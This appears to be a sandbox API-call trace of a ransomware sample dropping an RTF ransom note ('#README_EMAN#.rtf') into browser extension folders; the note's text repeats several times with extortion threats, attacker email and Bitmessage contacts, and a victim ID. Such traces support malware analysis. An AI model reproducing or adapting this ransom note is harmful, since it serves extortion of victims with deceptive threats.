f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.058] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.061] CloseHandle (hObject=0x294) returned 1 [0285.061] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\#readme_eman#.rtf")) returned 0xffffffff [0285.061] GetLastError () returned 0x2 [0285.061] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED 